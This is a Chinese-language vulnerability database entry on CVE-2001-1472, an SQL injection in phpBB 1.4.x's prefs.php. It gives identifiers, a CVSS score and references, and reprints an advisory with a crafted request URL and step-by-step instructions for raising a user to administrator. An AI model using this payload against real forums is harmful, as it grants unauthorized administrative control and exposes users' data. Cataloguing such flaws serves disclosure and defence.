PHPBB远程SQL注入操作漏洞

PHPBB远程SQL注入操作漏洞

漏洞ID 1106460 漏洞类型 SQL注入
发布时间 2001-08-03 更新时间 2005-10-20
图片[1]-PHPBB远程SQL注入操作漏洞-安全小百科CVE编号 CVE-2001-1472
图片[2]-PHPBB远程SQL注入操作漏洞-安全小百科CNNVD-ID CNNVD-200108-025
漏洞平台 PHP CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/21046
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-025
|漏洞详情
phpBB1.4.0和1.4.1版本的prefs.php存在SQL注入漏洞。远程认证用户借助viewemail参数执行任意SQL命令且获取管理访问权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/3142/info

phpBB is free, open-source, easy-to-use web forums software.

An issue exists in phpBB which allows a remote attacker to manipulate SQL queries in such a way as to gain an administrative account with the service.

This problem is due to improper validation of user-supplied input by certain variables in phpBB. This issue can be exploited by making a cleverly crafted web request that contains arbitrary user-supplied replacement values.

One consequence of successful exploitation is that the attacker will be privy to user information. 

http://sitename/phpBBfolder/prefs.php?save=1
&viewemail=1',user_level%3D'4'%20where%
20username%3D'l337h4x0r'%23

Summary:

1. Register an account on a phpBB board version
1.4.x .
2. Enter above URL with the correct sitename
and replace l337h4x0r with your username.
3. Click on "Administration Panel" near the bottom of
the page.
|参考资料

来源:US-CERTVulnerabilityNote:VU#314347
名称:VU#314347
链接:http://www.kb.cert.org/vuls/id/314347
来源:XF
名称:phpbb-admin-access(6944)
链接:http://xforce.iss.net/xforce/xfdb/6944
来源:BID
名称:3142
链接:http://www.securityfocus.com/bid/3142
来源:BUGTRAQ
名称:20010803phpBB1.4.0bugleadstoeasyadminprivileges
链接:http://www.securityfocus.com/archive/1/201715

相关推荐: Arkeia Client默认root用户口令漏洞

Arkeia Client默认root用户口令漏洞 漏洞ID 1200109 漏洞类型 未知 发布时间 2005-02-21 更新时间 2005-02-21 CVE编号 CVE-2005-0496 CNNVD-ID CNNVD-200502-079 漏洞平台 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享